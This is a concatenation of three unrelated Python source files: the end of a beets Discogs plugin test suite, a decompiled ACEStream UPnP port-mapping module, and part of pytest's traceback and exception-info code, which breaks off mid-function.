t = d.tracks
self.assertEqual(t[0].medium_index, 1)
self.assertEqual(t[0].index, 1)
self.assertEqual(t[0].medium_total, 2)
self.assertEqual(t[1].medium_index, 2)
self.assertEqual(t[1].index, 2)
self.assertEqual(t[1].medium_total, 2)
def test_parse_track_indices_several_media(self):
release = self._make_release_from_positions(['1-1', '1-2', '2-1',
'3-1'])
d = DiscogsPlugin().get_album_info(release)
t = d.tracks
self.assertEqual(d.mediums, 3)
self.assertEqual(t[0].medium_index, 1)
self.assertEqual(t[0].index, 1)
self.assertEqual(t[0].medium_total, 2)
self.assertEqual(t[1].medium_index, 2)
self.assertEqual(t[1].index, 2)
self.assertEqual(t[1].medium_total, 2)
self.assertEqual(t[2].medium_index, 1)
self.assertEqual(t[2].index, 3)
self.assertEqual(t[2].medium_total, 1)
self.assertEqual(t[3].medium_index, 1)
self.assertEqual(t[3].index, 4)
self.assertEqual(t[3].medium_total, 1)
def test_parse_position(self):
"""Test the conversion of discogs `position` to medium, medium_index
and subtrack_index."""
# List of tuples (discogs_position, (medium, medium_index, subindex)
positions = [('1', (None, '1', None)),
('A12', ('A', '12', None)),
('12-34', ('12-', '34', None)),
('CD1-1', ('CD1-', '1', None)),
('1.12', (None, '1', '12')),
('12.a', (None, '12', 'A')),
('12.34', (None, '12', '34')),
('1ab', (None, '1', 'AB')),
# Non-standard
('IV', ('IV', None, None)),
]
d = DiscogsPlugin()
for position, expected in positions:
self.assertEqual(d.get_track_index(position), expected)
def test_parse_tracklist_without_sides(self):
"""Test standard Discogs position 12.2.9#1: "without sides"."""
release = self._make_release_from_positions(['1', '2', '3'])
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 1)
self.assertEqual(len(d.tracks), 3)
def test_parse_tracklist_with_sides(self):
"""Test standard Discogs position 12.2.9#2: "with sides"."""
release = self._make_release_from_positions(['A1', 'A2', 'B1', 'B2'])
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 1) # 2 sides = 1 LP
self.assertEqual(len(d.tracks), 4)
def test_parse_tracklist_multiple_lp(self):
"""Test standard Discogs position 12.2.9#3: "multiple LP"."""
release = self._make_release_from_positions(['A1', 'A2', 'B1', 'C1'])
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 2) # 3 sides = 1 LP + 1 LP
self.assertEqual(len(d.tracks), 4)
def test_parse_tracklist_multiple_cd(self):
"""Test standard Discogs position 12.2.9#4: "multiple CDs"."""
release = self._make_release_from_positions(['1-1', '1-2', '2-1',
'3-1'])
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 3)
self.assertEqual(len(d.tracks), 4)
def test_parse_tracklist_non_standard(self):
"""Test non standard Discogs position."""
release = self._make_release_from_positions(['I', 'II', 'III', 'IV'])
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 1)
self.assertEqual(len(d.tracks), 4)
def test_parse_tracklist_subtracks_dot(self):
"""Test standard Discogs position 12.2.9#5: "sub tracks, dots"."""
release = self._make_release_from_positions(['1', '2.1', '2.2', '3'])
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 1)
self.assertEqual(len(d.tracks), 3)
release = self._make_release_from_positions(['A1', 'A2.1', 'A2.2',
'A3'])
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 1)
self.assertEqual(len(d.tracks), 3)
def test_parse_tracklist_subtracks_letter(self):
"""Test standard Discogs position 12.2.9#5: "sub tracks, letter"."""
release = self._make_release_from_positions(['A1', 'A2a', 'A2b', 'A3'])
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 1)
self.assertEqual(len(d.tracks), 3)
release = self._make_release_from_positions(['A1', 'A2.a', 'A2.b',
'A3'])
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 1)
self.assertEqual(len(d.tracks), 3)
def test_parse_tracklist_subtracks_extra_material(self):
"""Test standard Discogs position 12.2.9#6: "extra material"."""
release = self._make_release_from_positions(['1', '2', 'Video 1'])
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 2)
self.assertEqual(len(d.tracks), 3)
def test_parse_tracklist_subtracks_indices(self):
"""Test parsing of subtracks that include index tracks."""
release = self._make_release_from_positions(['', '', '1.1', '1.2'])
# Track 1: Index track with medium title
release.data['tracklist'][0]['title'] = 'MEDIUM TITLE'
# Track 2: Index track with track group title
release.data['tracklist'][1]['title'] = 'TRACK GROUP TITLE'
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 1)
self.assertEqual(d.tracks[0].disctitle, 'MEDIUM TITLE')
self.assertEqual(len(d.tracks), 1)
self.assertEqual(d.tracks[0].title, 'TRACK GROUP TITLE')
def test_parse_tracklist_subtracks_nested_logical(self):
"""Test parsing of subtracks defined inside a index track that are
logical subtracks (ie. should be grouped together into a single track).
"""
release = self._make_release_from_positions(['1', '', '3'])
# Track 2: Index track with track group title, and sub_tracks
release.data['tracklist'][1]['title'] = 'TRACK GROUP TITLE'
release.data['tracklist'][1]['sub_tracks'] = [
self._make_track('TITLE ONE', '2.1', '01:01'),
self._make_track('TITLE TWO', '2.2', '02:02')
]
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 1)
self.assertEqual(len(d.tracks), 3)
self.assertEqual(d.tracks[1].title, 'TRACK GROUP TITLE')
def test_parse_tracklist_subtracks_nested_physical(self):
"""Test parsing of subtracks defined inside a index track that are
physical subtracks (ie. should not be grouped together).
"""
release = self._make_release_from_positions(['1', '', '4'])
# Track 2: Index track with track group title, and sub_tracks
release.data['tracklist'][1]['title'] = 'TRACK GROUP TITLE'
release.data['tracklist'][1]['sub_tracks'] = [
self._make_track('TITLE ONE', '2', '01:01'),
self._make_track('TITLE TWO', '3', '02:02')
]
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 1)
self.assertEqual(len(d.tracks), 4)
self.assertEqual(d.tracks[1].title, 'TITLE ONE')
self.assertEqual(d.tracks[2].title, 'TITLE TWO')
def test_parse_tracklist_disctitles(self):
"""Test parsing of index tracks that act as disc titles."""
release = self._make_release_from_positions(['', '1-1', '1-2', '',
'2-1'])
# Track 1: Index track with medium title (Cd1)
release.data['tracklist'][0]['title'] = 'MEDIUM TITLE CD1'
# Track 4: Index track with medium title (Cd2)
release.data['tracklist'][3]['title'] = 'MEDIUM TITLE CD2'
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 2)
self.assertEqual(d.tracks[0].disctitle, 'MEDIUM TITLE CD1')
self.assertEqual(d.tracks[1].disctitle, 'MEDIUM TITLE CD1')
self.assertEqual(d.tracks[2].disctitle, 'MEDIUM TITLE CD2')
self.assertEqual(len(d.tracks), 3)
def test_parse_minimal_release(self):
"""Test parsing of a release with the minimal amount of information."""
data = {'id': 123,
'tracklist': [self._make_track('A', '1', '01:01')],
'artists': [{'name': 'ARTIST NAME', 'id': 321, 'join': ''}],
'title': 'TITLE'}
release = Bag(data=data,
title=data['title'],
artists=[Bag(data=d) for d in data['artists']])
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.artist, 'ARTIST NAME')
self.assertEqual(d.album, 'TITLE')
self.assertEqual(len(d.tracks), 1)
def test_parse_release_without_required_fields(self):
"""Test parsing of a release that does not have the required fields."""
release = Bag(data={}, refresh=lambda *args: None)
with capture_log() as logs:
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d, None)
self.assertIn('Release does not contain the required fields', logs[0])
def suite():
return unittest.TestLoader().loadTestsFromName(__name__)
if __name__ == '__main__':
unittest.main(defaultTest='suite')
|
|
#Embedded file name: ACEStream\Core\BitTornado\natpunch.pyo
import sys
import socket
import time
from traceback import print_exc
from subnetparse import IP_List
from clock import clock
from __init__ import createPeerID
from ACEStream.Core.NATFirewall.upnp import UPnPPlatformIndependent, UPnPError
from ACEStream.Core.NATFirewall.guessip import get_my_wan_ip
try:
True
except:
True = 1
False = 0
DEBUG = False
EXPIRE_CACHE = 30
ID = 'BT-' + createPeerID()[-4:]
try:
import pythoncom, win32com.client
win32_imported = 1
except ImportError:
if DEBUG and sys.platform == 'win32':
print >> sys.stderr, "natpunch: ERROR: pywin32 package not installed, UPnP mode 2 won't work now"
win32_imported = 0
UPnPError = UPnPError
class _UPnP1:
def __init__(self):
self.map = None
self.last_got_map = -100000000000.0
def _get_map(self):
if self.last_got_map + EXPIRE_CACHE < clock():
try:
dispatcher = win32com.client.Dispatch('HNetCfg.NATUPnP')
self.map = dispatcher.StaticPortMappingCollection
self.last_got_map = clock()
except:
if DEBUG:
print_exc()
self.map = None
return self.map
def test(self):
try:
success = True
except:
if DEBUG:
print_exc()
success = False
return success
def open(self, ip, p, iproto = 'TCP'):
map = self._get_map()
try:
map.Add(p, iproto, p, ip, True, ID)
if DEBUG:
print >> sys.stderr, 'upnp1: succesfully opened port: ' + ip + ':' + str(p)
success = True
except:
if DEBUG:
print >> sys.stderr, "upnp1: COULDN'T OPEN " + str(p)
print_exc()
success = False
return success
def close(self, p, iproto = 'TCP'):
map = self._get_map()
try:
map.Remove(p, iproto)
success = True
if DEBUG:
print >> sys.stderr, 'upnp1: succesfully closed port: ' + str(p)
except:
if DEBUG:
print >> sys.stderr, "upnp1: COULDN'T CLOSE " + str(p)
print_exc()
success = False
return success
def clean(self, retry = False, iproto = 'TCP'):
if not win32_imported:
return
try:
map = self._get_map()
ports_in_use = []
for i in xrange(len(map)):
try:
mapping = map[i]
port = mapping.ExternalPort
prot = str(mapping.Protocol).lower()
desc = str(mapping.Description).lower()
except:
port = None
if port and prot == iproto.lower() and desc[:3] == 'bt-':
ports_in_use.append(port)
success = True
for port in ports_in_use:
try:
map.Remove(port, iproto)
except:
success = False
if not success and not retry:
self.clean(retry=True)
except:
pass
def get_ext_ip(self):
return None
class _UPnP2:
def __init__(self):
self.services = None
self.last_got_services = -100000000000.0
def _get_services(self):
if not self.services or self.last_got_services + EXPIRE_CACHE < clock():
self.services = []
try:
f = win32com.client.Dispatch('UPnP.UPnPDeviceFinder')
for t in ('urn:schemas-upnp-org:service:WANIPConnection:1', 'urn:schemas-upnp-org:service:WANPPPConnection:1'):
try:
conns = f.FindByType(t, 0)
for c in xrange(len(conns)):
try:
svcs = conns[c].Services
for s in xrange(len(svcs)):
try:
self.services.append(svcs[s])
except:
if DEBUG:
print_exc()
except:
if DEBUG:
print_exc()
except:
if DEBUG:
print_exc()
except:
if DEBUG:
print_exc()
self.last_got_services = clock()
return self.services
def test(self):
try:
success = True
except:
success = False
return success
def open(self, ip, p, iproto = 'TCP'):
svcs = self._get_services()
success = False
for s in svcs:
try:
s.InvokeAction('AddPortMapping', ['',
p,
iproto,
p,
ip,
True,
ID,
0], '')
success = True
except:
if DEBUG:
print_exc()
if DEBUG and not success:
print >> sys.stderr, "upnp2: COULDN'T OPEN " + str(p)
print_exc()
return success
def close(self, p, iproto = 'TCP'):
svcs = self._get_services()
success = False
for s in svcs:
try:
s.InvokeAction('DeletePortMapping', ['', p, iproto], '')
success = True
except:
if DEBUG:
print_exc()
if DEBUG and not success:
print >> sys.stderr, "upnp2: COULDN'T CLOSE " + str(p)
print_exc()
return success
def get_ext_ip(self):
svcs = self._get_services()
success = None
for s in svcs:
try:
ret = s.InvokeAction('GetExternalIPAddress', [], '')
if DEBUG:
print >> sys.stderr, 'upnp2: GetExternapIPAddress returned', ret
dns = ret[1]
if str(dns[0]) != '':
success = str(dns[0])
elif DEBUG:
print >> sys.stderr, 'upnp2: RETURNED IP ADDRESS EMPTY'
except:
if DEBUG:
print_exc()
if DEBUG and not success:
print >> sys.stderr, "upnp2: COULDN'T GET EXT IP ADDR"
return success
class _UPnP3:
def __init__(self):
self.u = UPnPPlatformIndependent()
def test(self):
try:
retries = 0
interval = 4
while retries < 10:
self.u.discover()
if self.u.found_wanted_services():
if DEBUG:
print >> sys.stderr, '_UPnP3::test: success'
return True
retries += 1
interval *= 2
if DEBUG:
print >> sys.stderr, '_UPnP3::test: failed: retry in %d seconds' % interval
time.sleep(interval)
return False
except:
if DEBUG:
print_exc()
return False
def open(self, ip, p, iproto = 'TCP'):
try:
self.u.add_port_map(ip, p, iproto=iproto)
return True
except UPnPError as e:
if DEBUG:
print_exc()
raise e
except:
if DEBUG:
print_exc()
return False
def close(self, p, iproto = 'TCP'):
try:
self.u.del_port_map(p, iproto=iproto)
return True
except UPnPError as e:
if DEBUG:
print_exc()
raise e
except:
if DEBUG:
print_exc()
return False
def get_ext_ip(self):
try:
return self.u.get_ext_ip()
except UPnPError as e:
if DEBUG:
print_exc()
raise e
except:
if DEBUG:
print_exc()
return None
class UPnPWrapper:
__single = None
def __init__(self):
if UPnPWrapper.__single:
raise RuntimeError, 'UPnPWrapper is singleton'
UPnPWrapper.__single = self
self.upnp1 = _UPnP1()
self.upnp2 = _UPnP2()
self.upnp3 = _UPnP3()
self.upnplist = (None,
self.upnp1,
self.upnp2,
self.upnp3)
self.upnp = None
self.local_ip = None
self.last_got_ip = -100000000000.0
def getInstance(*args, **kw):
if UPnPWrapper.__single is None:
UPnPWrapper(*args, **kw)
return UPnPWrapper.__single
getInstance = staticmethod(getInstance)
def register(self, guessed_localip):
self.local_ip = guessed_localip
def get_ip(self):
if self.last_got_ip + EXPIRE_CACHE < clock():
if self.local_ip is None:
local_ips = IP_List()
local_ips.set_intranet_addresses()
try:
for info in socket.getaddrinfo(socket.gethostname(), 0, socket.AF_INET):
self.local_ip = info[4][0]
if local_ips.includes(self.local_ip):
self.last_got_ip = clock()
if DEBUG:
print >> sys.stderr, 'upnpX: Local IP found: ' + self.local_ip
break
else:
raise ValueError("upnpX: couldn't find intranet IP")
except:
self.local_ip = None
if DEBUG:
print >> sys.stderr, 'upnpX: Error finding local IP'
print_exc()
return self.local_ip
def test(self, upnp_type):
if DEBUG:
print >> sys.stderr, 'upnpX: testing UPnP type ' + str(upnp_type)
if not upnp_type or self.get_ip() is None or upnp_type <= 2 and not win32_imported:
if DEBUG:
print >> sys.stderr, 'upnpX: UPnP not supported'
return 0
if upnp_type != 3:
pythoncom.CoInitialize()
self.upnp = self.upnplist[upnp_type]
if self.upnp.test():
if DEBUG:
print >> sys.stderr, 'upnpX: ok'
return upnp_type
if DEBUG:
print >> sys.stderr, 'upnpX: tested bad'
return 0
def open(self, p, iproto = 'TCP'):
return self.upnp.open(self.get_ip(), p, iproto=iproto)
def close(self, p, iproto = 'TCP'):
return self.upnp.close(p, iproto=iproto)
def clean(self, iproto = 'TCP'):
return self.upnp1.clean(iproto=iproto)
def get_ext_ip(self):
return self.upnp.get_ext_ip()
if __name__ == '__main__':
ip = get_my_wan_ip()
print >> sys.stderr, 'guessed ip', ip
u = UPnPWrapper()
u.register(ip)
print >> sys.stderr, 'TEST RETURNED', u.test(3)
print >> sys.stderr, 'IGD says my external IP is', u.get_ext_ip()
print >> sys.stderr, 'IGD open returned', u.open(6881)
print >> sys.stderr, 'IGD close returned', u.close(6881)
|
|
from __future__ import absolute_import, division, print_function
import inspect
import sys
import traceback
from inspect import CO_VARARGS, CO_VARKEYWORDS
import re
from weakref import ref
from _pytest.compat import _PY2, _PY3, PY35, safe_str
import py
builtin_repr = repr
if _PY3:
from traceback import format_exception_only
else:
from ._py2traceback import format_exception_only
class Code(object):
""" wrapper around Python code objects """
def __init__(self, rawcode):
if not hasattr(rawcode, "co_filename"):
rawcode = getrawcode(rawcode)
try:
self.filename = rawcode.co_filename
self.firstlineno = rawcode.co_firstlineno - 1
self.name = rawcode.co_name
except AttributeError:
raise TypeError("not a code object: %r" % (rawcode,))
self.raw = rawcode
def __eq__(self, other):
return self.raw == other.raw
__hash__ = None
def __ne__(self, other):
return not self == other
@property
def path(self):
""" return a path object pointing to source code (note that it
might not point to an actually existing file). """
try:
p = py.path.local(self.raw.co_filename)
# maybe don't try this checking
if not p.check():
raise OSError("py.path check failed.")
except OSError:
# XXX maybe try harder like the weird logic
# in the standard lib [linecache.updatecache] does?
p = self.raw.co_filename
return p
@property
def fullsource(self):
""" return a _pytest._code.Source object for the full source file of the code
"""
from _pytest._code import source
full, _ = source.findsource(self.raw)
return full
def source(self):
""" return a _pytest._code.Source object for the code object's source only
"""
# return source only for that part of code
import _pytest._code
return _pytest._code.Source(self.raw)
def getargs(self, var=False):
""" return a tuple with the argument names for the code object
if 'var' is set True also return the names of the variable and
keyword arguments when present
"""
# handfull shortcut for getting args
raw = self.raw
argcount = raw.co_argcount
if var:
argcount += raw.co_flags & CO_VARARGS
argcount += raw.co_flags & CO_VARKEYWORDS
return raw.co_varnames[:argcount]
class Frame(object):
"""Wrapper around a Python frame holding f_locals and f_globals
in which expressions can be evaluated."""
def __init__(self, frame):
self.lineno = frame.f_lineno - 1
self.f_globals = frame.f_globals
self.f_locals = frame.f_locals
self.raw = frame
self.code = Code(frame.f_code)
@property
def statement(self):
""" statement this frame is at """
import _pytest._code
if self.code.fullsource is None:
return _pytest._code.Source("")
return self.code.fullsource.getstatement(self.lineno)
def eval(self, code, **vars):
""" evaluate 'code' in the frame
'vars' are optional additional local variables
returns the result of the evaluation
"""
f_locals = self.f_locals.copy()
f_locals.update(vars)
return eval(code, self.f_globals, f_locals)
def exec_(self, code, **vars):
""" exec 'code' in the frame
'vars' are optiona; additional local variables
"""
f_locals = self.f_locals.copy()
f_locals.update(vars)
py.builtin.exec_(code, self.f_globals, f_locals)
def repr(self, object):
""" return a 'safe' (non-recursive, one-line) string repr for 'object'
"""
return py.io.saferepr(object)
def is_true(self, object):
return object
def getargs(self, var=False):
""" return a list of tuples (name, value) for all arguments
if 'var' is set True also include the variable and keyword
arguments when present
"""
retval = []
for arg in self.code.getargs(var):
try:
retval.append((arg, self.f_locals[arg]))
except KeyError:
pass # this can occur when using Psyco
return retval
class TracebackEntry(object):
""" a single entry in a traceback """
_repr_style = None
exprinfo = None
def __init__(self, rawentry, excinfo=None):
self._excinfo = excinfo
self._rawentry = rawentry
self.lineno = rawentry.tb_lineno - 1
def set_repr_style(self, mode):
assert mode in ("short", "long")
self._repr_style = mode
@property
def frame(self):
import _pytest._code
return _pytest._code.Frame(self._rawentry.tb_frame)
@property
def relline(self):
return self.lineno - self.frame.code.firstlineno
def __repr__(self):
return "<TracebackEntry %s:%d>" % (self.frame.code.path, self.lineno + 1)
@property
def statement(self):
""" _pytest._code.Source object for the current statement """
source = self.frame.code.fullsource
return source.getstatement(self.lineno)
@property
def path(self):
""" path to the source code """
return self.frame.code.path
def getlocals(self):
return self.frame.f_locals
locals = property(getlocals, None, None, "locals of underlaying frame")
def getfirstlinesource(self):
# on Jython this firstlineno can be -1 apparently
return max(self.frame.code.firstlineno, 0)
def getsource(self, astcache=None):
""" return failing source code. """
# we use the passed in astcache to not reparse asttrees
# within exception info printing
from _pytest._code.source import getstatementrange_ast
source = self.frame.code.fullsource
if source is None:
return None
key = astnode = None
if astcache is not None:
key = self.frame.code.path
if key is not None:
astnode = astcache.get(key, None)
start = self.getfirstlinesource()
try:
astnode, _, end = getstatementrange_ast(self.lineno, source,
astnode=astnode)
except SyntaxError:
end = self.lineno + 1
else:
if key is not None:
astcache[key] = astnode
return source[start:end]
source = property(getsource)
def ishidden(self):
""" return True if the current frame has a var __tracebackhide__
resolving to True
If __tracebackhide__ is a callable, it gets called with the
ExceptionInfo instance and can decide whether to hide the traceback.
mostly for internal use
"""
try:
tbh = self.frame.f_locals['__tracebackhide__']
except KeyError:
try:
tbh = self.frame.f_globals['__tracebackhide__']
except KeyError:
return False
if callable(tbh):
return tbh(None if self._excinfo is None else self._excinfo())
else:
return tbh
def __str__(self):
try:
fn = str(self.path)
except py.error.Error:
fn = '???'
name = self.frame.code.name
try:
line = str(self.statement).lstrip()
except KeyboardInterrupt:
raise
except: # noqa
line = "???"
return " File %r:%d in %s\n %s\n" % (fn, self.lineno + 1, name, line)
def name(self):
return self.frame.code.raw.co_name
name = property(name, None, None, "co_name of underlaying code")
class Traceback(list):
""" Traceback objects encapsulate and offer higher level
access to Traceback entries.
"""
Entry = TracebackEntry
def __init__(self, tb, excinfo=None):
""" initialize from given python traceback object and ExceptionInfo """
self._excinfo = excinfo
if hasattr(tb, 'tb_next'):
def f(cur):
while cur is not None:
yield self.Entry(cur, excinfo=excinfo)
cur = cur.tb_next
list.__init__(self, f(tb))
else:
list.__init__(self, tb)
def cut(self, path=None, lineno=None, firstlineno=None, excludepath=None):
""" return a Traceback instance wrapping part of this Traceback
by provding any combination of path, lineno and firstlineno, the
first frame to start the to-be-returned traceback is determined
this allows cutting the first part of a Traceback instance e.g.
for formatting reasons (removing some uninteresting bits that deal
with handling of the exception/traceback)
"""
for x in self:
code = x.frame.code
codepath = code.path
if ((path is None or codepath == path) and
(excludepath is None or not hasattr(codepath, 'relto') or
not codepath.relto(excludepath)) and
(lineno is None or x.lineno == lineno) and
(firstlineno is None or x.frame.code.firstlineno == firstlineno)):
return Traceback(x._rawentry, self._excinfo)
return self
def __getitem__(self, key):
val = super(Traceback, self).__getitem__(key)
if isinstance(key, type(slice(0))):
val = self.__class__(val)
return val
def filter(self, fn=lambda x: not x.ishidden()):
""" return a Traceback instance with certain items removed
fn is a function that gets a single argument, a TracebackEntry
instance, and should return True when the item should be added
to the Traceback, False when not
by default this removes all the TracebackEntries which are hidden
(see ishidden() above)
"""
return Traceback(filter(fn, self), self._excinfo)
def getcrashentry(self):
""" return last non-hidden traceback entry that lead
to the exception of a traceback.
"""
for i in range(-1, -len(self) - 1, -1):
entry = self[i]
if not entry.ishidden():
return entry
return self[-1]
def recursionindex(self):
""" return the index of the frame/TracebackEntry where recursion
originates if appropriate, None if no recursion occurred
"""
cache = {}
for i, entry in enumerate(self):
# id for the code.raw is needed to work around
# the strange metaprogramming in the decorator lib from pypi
# which generates code objects that have hash/value equality
# XXX needs a test
key = entry.frame.code.path, id(entry.frame.code.raw), entry.lineno
# print "checking for recursion at", key
values = cache.setdefault(key, [])
if values:
f = entry.frame
loc = f.f_locals
for otherloc in values:
if f.is_true(f.eval(co_equal,
__recursioncache_locals_1=loc,
__recursioncache_locals_2=otherloc)):
return i
values.append(entry.frame.f_locals)
return None
co_equal = compile('__recursioncache_locals_1 == __recursioncache_locals_2',
'?', 'eval')
class ExceptionInfo(object):
""" wraps sys.exc_info() objects and offers
help for navigating the traceback.
"""
_striptext = ''
_assert_start_repr = "AssertionError(u\'assert " if _PY2 else "AssertionError(\'assert "
def __init__(self, tup=None, exprinfo=None):
import _pytest._code
if tup is None:
tup = sys.exc_info()
if exprinfo is None and isinstance(tup[1], AssertionError):
exprinfo = getattr(tup[1], 'msg', None)
if exprinfo is None:
exprinfo = py.io.saferepr(tup[1])
if exprinfo and exprinfo.startswith(self._assert_start_repr):
self._striptext = 'AssertionError: '
self._excinfo = tup
#: the exception class
self.type = tup[0]
#: the exception instance
self.value = tup[1]
#: the exception raw traceback
self.tb = tup[2]
#: the exception type name
self.typename = self.type.__name__
#: the exception traceback (_pytest._code.Traceback instance)
self.traceback = _pytest._code.Traceback(self.tb, excinfo=ref(self))
def __repr__(self):
return "<ExceptionInfo %s tblen=%d>" % (self.typename, len(self.traceback))
def exconly(self, tryshort=False):
""" return the exception as a string
when 'tryshort' resolves to True, and the exception is a
_pytest._code._AssertionError, only the actual exception part of
the exception representation is returned (so 'AssertionError: ' is
removed from the beginning)
"""
lines = format_exception_only(self.type, self.value)
text = ''.join(lines)
text = text.rstrip()
if tryshort:
if text.startswith(self._striptext):
text = text[len(self._striptext):]
return text
def errisinstance(self, exc):
""" return True if the exception is an instance of exc """
return isinstance(self.value, exc)
def _getreprcrash(self):
exconly = self.exconly(tryshort=True)
entry = self.traceback.getcrashentry()
path, lineno = entry.frame.code.raw.co_filename, entry.lineno
return ReprFileLocation(path, lineno + 1, exconly)
def getrepr(self, showlocals=False, style="long",
abspath=False, tbfilter=True, funcargs=False):
""" return str()able representation of this exception info.
showlocals: show locals per traceback entry
style: long|short|no|native traceback style
tbfilter: hide entries (where __tracebackhide__ is true)
in case of style==native, tbfilter and showlocals is ignored.
"""
if style == 'native':
return ReprExceptionInfo(ReprTracebackNative(
traceback.format_exception(
self.type,
self.value,
self.traceback[0]._rawentry,
)), self._getreprcrash())
fmt = FormattedExcinfo(showlocals=showlocals, style=style,
abspath=abspath, tbfilter=tbfilter, funcargs=funcargs)
return fmt.repr_excinfo(self)
def __str__(self):
entry = self.traceback[-1]
loc = ReprFileLocation(entry.path, entry.lineno + 1, self.exconly())
return str(loc)
def __unicode__(self):
entry = self.traceback[-1]
loc = ReprFileLocation(entry.path, entry.lineno + 1, self.exconly())
return unicode(loc)
def match(self, regexp):
"""
Match the regular expression 'regexp' on the string representation of
the exception. If it matches then True is returned (so that it is
possible to write 'assert excinfo.match()'). If it doesn't match an
AssertionError is raised.
"""
__tracebackhide__ = True
if not re.search(regexp, str(self.value)):
assert 0, "Pattern '{0!s}' not found in '{1!s}'".format(
regexp, self.value)
return True
class FormattedExcinfo(object):
""" presenting information about failing Functions and Generators. """
# for traceback entries
flow_marker = ">"
fail_marker = "E"
def __init__(self, showlocals=False, style="long", abspath=True, tbfilter=True, funcargs=False):
self.showlocals = showlocals
self.style = style
self.tbfilter = tbfilter
self.funcargs = funcargs
self.abspath = abspath
self.astcache = {}
def _getindent(self, source):
# figure out indent for given source
try:
s = str(source.getstatement(len(source) - 1))
except KeyboardInterrupt:
raise
except: # noqa
try:
s = str(source[-1])
except KeyboardInterrupt:
raise
except: # noqa
return 0
return 4 + (len(s) - len(s.lstrip()))
def _getentrysource(self, entry):
source = entry.getsource(self.astcache)
if source is not None:
source = source.deindent()
return source
def _saferepr(self, obj):
return py.io.saferepr(obj)
def repr_args(self, entry):
if self.funcargs:
args = []
for argname, argvalue in entry.frame.getargs(var=True):
args.append((argname, self._saferepr(argvalue)))
return ReprFuncArgs(args)
def get_source(self, source, line_index=-1, excinfo=None, short=False):
""" return formatted and marked up source lines. """
import _pytest._code
lines = []
if source is None or line_index >= len(source.lines):
source = _pytest._code.Source("???")
line_index = 0
if line_index < 0:
line_index += len(source)
space_prefix = " "
if short:
lines.append(space_prefix + source.lines[line_index].strip())
else:
for line in source.lines[:line_index]:
lines.append(space_prefix + line)
lines.append(self.flow_marker + " " + source.lines[line_index])
for line in source.lines[line_index + 1:]:
lines.append(space_prefix + line)
if excinfo is not None:
indent = 4 if short else self._getindent(source)
lines.extend(self.get_exconly(excinfo, indent=indent, markall=True))
return lines
def get_exconly(self, excinfo, indent=4, markall=False):
lines = []
indent = " " * indent
# get the real exception information out
exlines = excinfo.exconly(tryshort=True).split('\n')
failindent = self.fail_marker + indent[1:]
for line in exlines:
lines.append(failindent + line)
if not markall:
failindent = indent
return lines
def repr_locals(self, locals):
if self.showlocals:
lines = []
keys = [loc for loc in locals if loc[0] != "@"]
keys.sort()
for name in keys:
value = locals[name]
if name == '__builtins__':
lines.append("__builtins__ = <builtins>")
else:
# This formatting could all be handled by the
# _repr() function, which is only reprlib.Repr in
# disguise, so is very configurable.
str_repr = self._saferepr(value)
# if len(str_repr) < 70 or not isinstance(value,
# (list, tuple, dict)):
lines.append("%-10s = %s" % (name, str_repr))
# else:
# self._line("%-10s =\\" % (name,))
# # XXX
# pprint.pprint(value, stream=self.excinfowriter)
return ReprLocals(lines)
def repr_traceback_entry(self, entry, excinfo=None):
import _pytest._code
source = self._getentrysource(entry)
if source is None:
source = _pytest._code.Source("???")
line_index = 0
else:
# entry.getfirstlinesource() can be -1, should be 0 on jython
line_index = entry.lineno - max(entry.getfirstlinesource(), 0)
lines = []
style = entry._repr_style
if style is None:
style = self.style
if style in ("short", "long"):
short = style == "short"
reprargs = self.repr_args(entry) if not short else None
s = self.get_source(source, line_index, excinfo, short=short)
lines.extend(s)
if short:
message = "in %s" % (entry.name)
else:
message = excinfo and excinfo.typename or ""
path = self._makepath(entry.path)
filelocrepr = ReprFileLocation(path, entry.lineno + 1, message)
localsrepr = None
if not short:
localsrepr = self.repr_locals(entry.locals)
return ReprEntry(lines, reprargs, localsrepr, filelocrepr, style)
if excinfo:
lines.extend(self.get_exconly(excinfo, indent=4))
return ReprEntry(lines, None, None, None, style)
def _makepath(self, path):
if not self.abspath:
try:
np = py.path.local().bestrelpath(path)
except OSError:
return path
if len(np) < len(str(path)):
path = np
return path
def repr_traceback(self, excinfo):
traceback = excinfo.traceback
if self.tbfilter:
traceback = traceback.filter()
if is_recursion_error(excinfo):
traceback, extraline = self._truncate_recursive_traceback(traceback)
else:
extraline = None
last = traceback[-1]
entries = []
for index, entry in enumerate(traceback):
einfo = (last == entry) and excinfo or None
reprentry = self.repr_traceback_entry(entry, einfo)
entries.append(reprentry)
return ReprTraceback(entries, extraline, style=self.style)
def _truncate_recursive_traceback(self, traceback):
"""
Truncate the given recursive traceback trying to find the starting point
of the recursion.
The detection is done by going through each traceback entry and finding the
point in which the locals of the frame are equal to the locals of a previous frame (see ``recursionindex()``.
Handle the situation where the recursion process might raise an exception (for example
comparing numpy arrays using equality raises a TypeError), in which case we do our best to
warn the user of the error and show a limited traceback.
"""
try:
recursionindex = traceback.recursionindex()
except Exception as e:
max_frames = 10
extraline = (
'!!! Recursion error detected, but an error occurred locating the origin of recursion.\n'
' The following exception happened when comparing locals in the stack frame:\n'
' {exc_type}: {exc_msg}\n'
' Displaying first and last {max_frames} stack frames out of {total}.'
).format(exc_type=type(e).__name__, exc_msg=safe_str(e), max_frames=max_frames, total=len(traceback))
traceback = traceback[:max_frames] + traceback[-max_frames:]
else:
if recursionindex is not None:
extraline = "!!! Recursion detected (same locals & position)"
traceback = traceback[:recursionindex + 1]
else:
extraline = None
return traceback, extraline
def repr_excinfo(self, excinfo):
if _PY2:
reprtraceback = self.repr_traceback(excinfo)
reprcrash = excinfo._getreprcrash()
